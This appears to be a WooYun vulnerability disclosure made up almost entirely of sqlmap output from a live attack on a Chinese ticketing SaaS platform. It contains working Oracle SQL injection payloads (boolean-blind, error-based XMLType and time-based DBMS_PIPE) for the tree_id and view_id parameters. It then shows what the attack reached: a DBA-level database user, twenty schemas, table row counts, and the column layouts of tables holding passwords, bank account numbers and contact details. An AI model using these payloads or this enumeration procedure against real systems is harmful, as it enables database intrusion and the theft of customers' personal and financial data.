WooYun.org

[08:03:30] [WARNING] GET parameter 'sdate' is not injectable
sqlmap identified the following injection points with a total of 2729 HTTP(s) re
quests:
---
Place: GET
Parameter: tree_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=prodlist&view_id=lfsqwc&tree_id=0 AND 7040=7040&sdate=2015-1
1-11
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: action=prodlist&view_id=lfsqwc&tree_id=0 AND 2498=(SELECT UPPER(XML
Type(CHR(60)||CHR(58)||CHR(113)||CHR(109)||CHR(118)||CHR(113)||CHR(113)||(SELECT
 (CASE WHEN (2498=2498) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(1
13)||CHR(99)||CHR(113)||CHR(62))) FROM DUAL)&sdate=2015-11-11
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: action=prodlist&view_id=lfsqwc&tree_id=0 AND 4368=DBMS_PIPE.RECEIVE
_MESSAGE(CHR(112)||CHR(79)||CHR(80)||CHR(67),5)&sdate=2015-11-11
Place: GET
Parameter: view_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=prodlist&view_id=lfsqwc' AND 2948=2948 AND 'KuUs'='KuUs&tree
_id=0&sdate=2015-11-11
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: action=prodlist&view_id=lfsqwc' AND 1770=(SELECT UPPER(XMLType(CHR(
60)||CHR(58)||CHR(113)||CHR(109)||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WH
EN (1770=1770) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(113)||CHR(
99)||CHR(113)||CHR(62))) FROM DUAL) AND 'zMWH'='zMWH&tree_id=0&sdate=2015-11-11
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: action=prodlist&view_id=lfsqwc' AND 3721=DBMS_PIPE.RECEIVE_MESSAGE(
CHR(111)||CHR(120)||CHR(70)||CHR(90),5) AND 'wPuV'='wPuV&tree_id=0&sdate=2015-11
-11
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: view_id, type: Single quoted string (default)
[1] place: GET, parameter: tree_id, type: Unescaped numeric
[q] Quit
> 0
[08:13:09] [INFO] the back-end DBMS is Oracle
web application technology: Apache, JSP
back-end DBMS: Oracle
[08:13:28] [INFO] fetching current user
[08:13:28] [INFO] retrieved: SAAS14
current user:    'SAAS14'
[08:13:28] [INFO] fetching current database
[08:13:28] [INFO] resumed: SAAS14
[08:13:28] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'SAAS14'
[08:13:28] [INFO] testing if current user is DBA
current user is DBA:    True
available databases [20]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SAAS14
[*] SAAS15
[*] SAAS16
[*] SAAS17
[*] SAAS18
[*] SAAS19
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: SAAS19
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| USR_LOG                 | 58      |
| INFO_HOTEL_NUM          | 44      |
| WX_USER_INFO            | 44      |
| USR_LOGIN_LOG           | 40      |
| INTERFACE_PROD_SYNC_LOG | 22      |
| USR_INFO                | 10      |
| USR_LOGIN               | 10      |
| INFO_TICKET             | 9       |
| INFO_TICKET_RELVIEW     | 9       |
| INFO_HOTEL              | 8       |
| WX_SCENE_LOG            | 6       |
| B2B_TICKET              | 3       |
| B2B_TICKET_DETAIL       | 3       |
| B2B_TICKET_PEOPLE       | 3       |
| ORDER_LOG               | 3       |
| USR_CREDIT_LOG          | 3       |
| USR_GETPASS_LOG         | 3       |
| USR_GRADE               | 3       |
| B2B_GRADE_PRICE         | 2       |
| INFO_TICKET_CUST        | 2       |
| INFO_TICKET_NUM         | 2       |
| USR_DOCUMENT_TEMP       | 2       |
| USR_INFO_EXPRESS        | 2       |
| USR_INTERFACE_INFO      | 2       |
| WX_MSG                  | 2       |
| INFO_CONDS              | 1       |
| INFO_NEWS               | 1       |
| INFO_TICKET_EX          | 1       |
| INFO_TICKET_PRICE       | 1       |
| RECE_PAYMENT_DETAIL     | 1       |
| RECE_PAYMENT_LIST       | 1       |
| RECE_STATEMENT_LIST     | 1       |
| USR_ACCOUNT_SET         | 1       |
| USR_CREDIT              | 1       |
| USR_PRINT_TEMP          | 1       |
+-------------------------+---------+
Database: SAAS14
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| LVMAMA_PUSH_LOG         | 2508709 |
| LVMAMA_VIEW             | 69067   |
| USR_LOG                 | 57394   |
| CM_ORDER_LOG            | 49478   |
| B2B_TICKET_PEOPLE       | 32639   |
| PAY_ORDER_LOG           | 29497   |
| B2B_TICKET              | 28058   |
| B2B_TICKET_DETAIL       | 28058   |
| B2B_TICKET_EX           | 28029   |
| CM_SYNC_LOG             | 27699   |
| INTERFACE_LVMAMA_LOG    | 25790   |
| LVMAMA_PRODUCT_LIST     | 23297   |
| INFO_TICKET             | 23296   |
| ORDER_LOG               | 22104   |
| INFO_TICKET_RELVIEW     | 16531   |
| LVMAMA_CHUANHUO_LOG     | 14636   |
| USR_LOGIN_LOG           | 11414   |
| CM_PROD_LOG             | 4591    |
| CM_SYNC_PROD_LOG        | 4141    |
| PAY_BALANCE             | 3770    |
| PAY_MOMEY_LOG           | 2681    |
| B2B_TICKET_CHANGE       | 1330    |
| B2B_CHANNEL_PRICE       | 645     |
| LVMAMA_VIEW_INFO        | 610     |
| INFO_TICKET_NUM         | 559     |
| USR_LOGIN               | 439     |
| INFO_TICKET_CUST        | 417     |
| USR_INFO                | 385     |
| B2B_CHANNEL_PRICE_DAY   | 382     |
| USR_CREDIT_LOG          | 369     |
| WX_SCENE_LOG            | 308     |
| USR_GETPASS_LOG         | 208     |
| INFO_TICKET_EX          | 136     |
| LVMAMA_PRODUCT_INFO     | 72      |
| USR_ATTENTION           | 65      |
| ORDER_ABNORMAL_LOG      | 51      |
| USR_INFO_B2C            | 45      |
| WX_USER_INFO            | 45      |
| USR_INTERFACE_INFO      | 41      |
| INTERFACE_PROD_SYNC_LOG | 32      |
| WX_AD_DETAIL            | 23      |
| USR_MEMBER              | 18      |
| INFO_TICKET_PRICE       | 6       |
| ORDER_CHANGE_LOG        | 5       |
| WX_AD                   | 5       |
| USR_CREDIT              | 4       |
| WX_AD_SEND_LOG          | 4       |
| WX_MSG_TEMP             | 2       |
| CUST_INFO_GROUP_CHANNEL | 1       |
| INFO_CONDS              | 1       |
| INFO_TICKET_CANCEL      | 1       |
| INTERFACE_XIECHENG_LOG  | 1       |
| LVMAMA_UPDATE_FLAG      | 1       |
| SAAS_DATAMAN            | 1       |
| USR_DOCUMENT_TEMP       | 1       |
| USR_INFO_EXPRESS        | 1       |
| WX_ORDER_TASK           | 1       |
+-------------------------+---------+
Database: SAAS14
Table: USR_LOG
[7 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| CUST_ID        | NUMBER   |
| LOG_DATE       | DATE     |
| LOG_DESC       | VARCHAR2 |
| LOG_NUM        | VARCHAR2 |
| LOG_TYPE       | NUMBER   |
| PARENT_CUST_ID | NUMBER   |
| USER_ID        | VARCHAR2 |
+----------------+----------+
Database: SAAS14
Table: USR_LOGIN_LOG
[7 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| COOKIEID       | VARCHAR2 |
| CUST_ID        | NUMBER   |
| IP             | VARCHAR2 |
| LOGIN_DATE     | DATE     |
| LOGIN_TYPE     | NUMBER   |
| PARENT_CUST_ID | NUMBER   |
| USER_ID        | VARCHAR2 |
+----------------+----------+
Database: SAAS14
Table: USR_INFO_EXPRESS
[9 columns]
+----------------+----------+
| Column         | Type     |
+----------------+----------+
| ACCOUNT_NO     | VARCHAR2 |
| CUST_ID        | NUMBER   |
| FROM_ADDRESS   | VARCHAR2 |
| FROM_COM       | VARCHAR2 |
| FROM_MAN       | VARCHAR2 |
| FROM_TEL       | VARCHAR2 |
| PARENT_CUST_ID | NUMBER   |
| SHIP_INFO      | VARCHAR2 |
| UPDATE_DATE    | DATE     |
+----------------+----------+
Database: SAAS14
Table: USR_CREDIT
[8 columns]
+----------------+--------+
| Column         | Type   |
+----------------+--------+
| ALL_CREDIT_NUM | NUMBER |
| CREATE_DATE    | DATE   |
| CREDIT_CUST_ID | NUMBER |
| CREDIT_NUM     | NUMBER |
| CREDIT_TYPE    | NUMBER |
| CUST_ID        | NUMBER |
| ID             | NUMBER |
| USE_CREDIT_NUM | NUMBER |
+----------------+--------+
Database: SAAS14
Table: USR_INFO
[95 columns]
+---------------------+----------+
| Column              | Type     |
+---------------------+----------+
| KEY                 | VARCHAR2 |
| ACCOUNT             | VARCHAR2 |
| ACCOUNT_NAME        | VARCHAR2 |
| AGREEMENT_DATE      | DATE     |
| AGREEMENT_IP        | VARCHAR2 |
| AGREEMENT_USER      | VARCHAR2 |
| ANDROID_UID         | VARCHAR2 |
| AREA_ID             | NUMBER   |
| ATTENT_COUNT        | NUMBER   |
| BANK_ACCOUNT_NAME   | VARCHAR2 |
| BANK_ACCOUNT_NO     | VARCHAR2 |
| BANK_CITY           | VARCHAR2 |
| BANK_CITYCODE       | VARCHAR2 |
| BANK_NAME           | VARCHAR2 |
| BANK_PROVINCE       | VARCHAR2 |
| BANK_TYPE           | VARCHAR2 |
| BEIANHAO            | VARCHAR2 |
| CHECK_PRINT_NUM     | NUMBER   |
| CHECK_PRINT_PRICE   | VARCHAR2 |
| CONTRACT_END_DATE   | DATE     |
| CONTRACT_PERSON     | VARCHAR2 |
| CONTRACT_START_DATE | DATE     |
| CURRENCY_TYPE       | NUMBER   |
| CUST_CODE           | VARCHAR2 |
| CUST_DESC           | CLOB     |
| CUST_GAT_FEE        | NUMBER   |
| CUST_GAT_LIMIT      | NUMBER   |
| CUST_GRADE          | NUMBER   |
| CUST_ID             | NUMBER   |
| CUST_NAME           | VARCHAR2 |
| CUST_PAY_FEE        | NUMBER   |
| CUST_TYPE           | NUMBER   |
| CUST_WEBSITE        | VARCHAR2 |
| DEPOSIT             | NUMBER   |
| DYCON               | VARCHAR2 |
| DYSHOW              | NUMBER   |
| FEE                 | NUMBER   |
| GET_MONEY_MODE      | NUMBER   |
| INTERFACE_PAY_TYPE  | NUMBER   |
| IS_B2B              | NUMBER   |
| IS_CHECK            | NUMBER   |
| IS_CHECK_VALUES     | VARCHAR2 |
| IS_CONFIRM_ORDER    | NUMBER   |
| IS_DISCOUNT         | NUMBER   |
| IS_GAT_MONEY        | NUMBER   |
| IS_GROUP            | NUMBER   |
| IS_POST             | NUMBER   |
| IS_PRODMANAGER      | NUMBER   |
| IS_SAAS             | NUMBER   |
| IS_SENDSMS          | NUMBER   |
| IS_WHILE            | NUMBER   |
| LAST_IP             | VARCHAR2 |
| LINK_ADDRESS        | VARCHAR2 |
| LINK_EMAIL          | VARCHAR2 |
| LINK_FAX            | VARCHAR2 |
| LINK_MOBILE         | VARCHAR2 |
| LINK_NAME           | VARCHAR2 |
| LINK_PHONE          | VARCHAR2 |
| LINK_QQ             | VARCHAR2 |
| LINK_SOURCE         | VARCHAR2 |
| LOGIN_COUNT         | NUMBER   |
| LOGO                | VARCHAR2 |
| MANAGER_MEMO        | CLOB     |
| ORDER_COUNT         | NUMBER   |
| ORDER_CUST_POWER    | NUMBER   |
| ORDER_MONEY         | NUMBER   |
| ORDER_POWER_FIELD   | VARCHAR2 |
| ORDER_TICKET        | NUMBER   |
| PARENT_AGENT_ID     | NUMBER   |
| PARENT_CUST_ID      | NUMBER   |
| PAY_MODE            | NUMBER   |
| PRICESTATE_PUSHMAIL | VARCHAR2 |
| PROD_COUNT          | NUMBER   |
| REG_DATE            | DATE     |
| REG_IP              | VARCHAR2 |
| REMARK              | VARCHAR2 |
| REPORT_POWER        | VARCHAR2 |
| RETURN_MODE         | NUMBER   |
| SALE_CHANNEL        | VARCHAR2 |
| SALE_COUNT          | NUMBER   |
| SALE_MONEY          | NUMBER   |
| SALE_TICKET         | NUMBER   |
| SALE_TYPE           | NUMBER   |
| SEAL_PATH           | VARCHAR2 |
| SENDMSG_MOBILE      | VARCHAR2 |
| SENDMSG_SMS         | VARCHAR2 |
| SERVICE_FEE_PAY     | NUMBER   |
| SOURCE_URL          | VARCHAR2 |
| STATE               | NUMBER   |
| STOP_DATE           | DATE     |
| STOP_IP             | VARCHAR2 |
| STOP_USER           | VARCHAR2 |
| USER_ID             | VARCHAR2 |
| VIP                 | NUMBER   |
| WHILE_RELCODE       | VARCHAR2 |
+---------------------+----------+
Database: SAAS14
Table: PAY_MOMEY_LOG
[17 columns]
+----------------------+----------+
| Column               | Type     |
+----------------------+----------+
| CUR_BALANCE          | NUMBER   |
| CUST_ID              | NUMBER   |
| ID                   | NUMBER   |
| PARENT_CUST_ID       | NUMBER   |
| PAY_ACCOUNT          | VARCHAR2 |
| PAY_BALANCE_ID       | NUMBER   |
| PAY_DATE             | DATE     |
| PAY_LOG              | CLOB     |
| PAY_NUM              | NUMBER   |
| PAY_SERVICE          | VARCHAR2 |
| PAY_SERVICE_ORDER_ID | VARCHAR2 |
| PAY_TYPE             | NUMBER   |
| REC_BALANCE          | NUMBER   |
| STATE                | NUMBER   |
| USER_ID              | VARCHAR2 |
| USER_REMARK          | CLOB     |
| WORKFLOWNO           | VARCHAR2 |
+----------------------+----------+
Database: SAAS14
Table: USR_MEMBER
[26 columns]
+-------------------+----------+
| Column            | Type     |
+-------------------+----------+
| ACCOUNT           | VARCHAR2 |
| ACCOUNT_NAME      | VARCHAR2 |
| BANK_ACCOUNT_NAME | VARCHAR2 |
| BANK_ACCOUNT_NO   | VARCHAR2 |
| BANK_CITY         | VARCHAR2 |
| BANK_NAME         | VARCHAR2 |
| BANK_PROVINCE     | VARCHAR2 |
| BANK_TYPE         | VARCHAR2 |
| BOOK_COUNT        | NUMBER   |
| DEPOSIT           | NUMBER   |
| EMAIL             | VARCHAR2 |
| IMG               | VARCHAR2 |
| LAST_LOGIN        | DATE     |
| LOGIN_COUNT       | NUMBER   |
| LOGIN_TYPE        | NUMBER   |
| MOBILE            | VARCHAR2 |
| ORDER_COUNT       | NUMBER   |
| ORDER_CUST_ID     | NUMBER   |
| OUT_USER_ID       | VARCHAR2 |
| PARENT_CUST_ID    | NUMBER   |
| PASSWORD          | VARCHAR2 |
| REG_DATE          | DATE     |
| STATUS            | NUMBER   |
| USER_ID           | NUMBER   |
| USER_NAME         | VARCHAR2 |
| VCODE             | VARCHAR2 |
+-------------------+----------+
Database: SAAS14
Table: WX_USER_INFO
[21 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| AREA_ID          | NUMBER   |
| CITY             | VARCHAR2 |
| COUNTRY          | VARCHAR2 |
| CREATE_DATE      | DATE     |
| CUST_ID          | NUMBER   |
| HEADIMGURL       | VARCHAR2 |
| LOGIN_DATE       | DATE     |
| NICKNAME         | VARCHAR2 |
| OPENID           | VARCHAR2 |
| ORDER_CUST_ID    | NUMBER   |
| PARENT_CUST_ID   | NUMBER   |
| PROVINCE         | VARCHAR2 |
| SEX              | NUMBER   |
| SOURCE_ID        | NUMBER   |
| STATE            | NUMBER   |
| SUBSCRIBE_TIME   | DATE     |
| TREE_ID          | NUMBER   |
| UNSUBSCRIBE_TIME | DATE     |
| USER_ID          | VARCHAR2 |
| USER_LANGUAGE    | VARCHAR2 |
| USER_MEMO        | VARCHAR2 |
+------------------+----------+
Database: SAAS14
Table: USR_LOGIN
[32 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| CUST_ID          | NUMBER   |
| CZ_STARTTIME     | DATE     |
| CZCODE           | VARCHAR2 |
| DEPT_ID          | NUMBER   |
| DUTY_STATE       | NUMBER   |
| DYCON            | VARCHAR2 |
| DYSHOW           | NUMBER   |
| EMAIL            | VARCHAR2 |
| FAX              | VARCHAR2 |
| IS_CZ            | NUMBER   |
| IS_DISPRICE      | NUMBER   |
| IS_MANAGER       | NUMBER   |
| IS_ORDERLIST     | NUMBER   |
| IS_PAY           | NUMBER   |
| IS_SHOWSYSTEMMSG | NUMBER   |
| IS_VALIDATE      | NUMBER   |
| LAST_DATE        | DATE     |
| LAST_IP          | VARCHAR2 |
| LOGIN_COUNT      | NUMBER   |
| LYT_ID           | VARCHAR2 |
| MOBILE           | VARCHAR2 |
| PARENT_AGENT_ID  | NUMBER   |
| PASSWORD         | VARCHAR2 |
| PHONE            | VARCHAR2 |
| PWD              | VARCHAR2 |
| ROLE_ID          | NUMBER   |
| ROLE_TYPE        | NUMBER   |
| USER_GRADE       | NUMBER   |
| USER_ID          | VARCHAR2 |
| USER_NAME        | VARCHAR2 |
| USER_PERMISSION  | VARCHAR2 |
| USER_STATE       | NUMBER   |
+------------------+----------+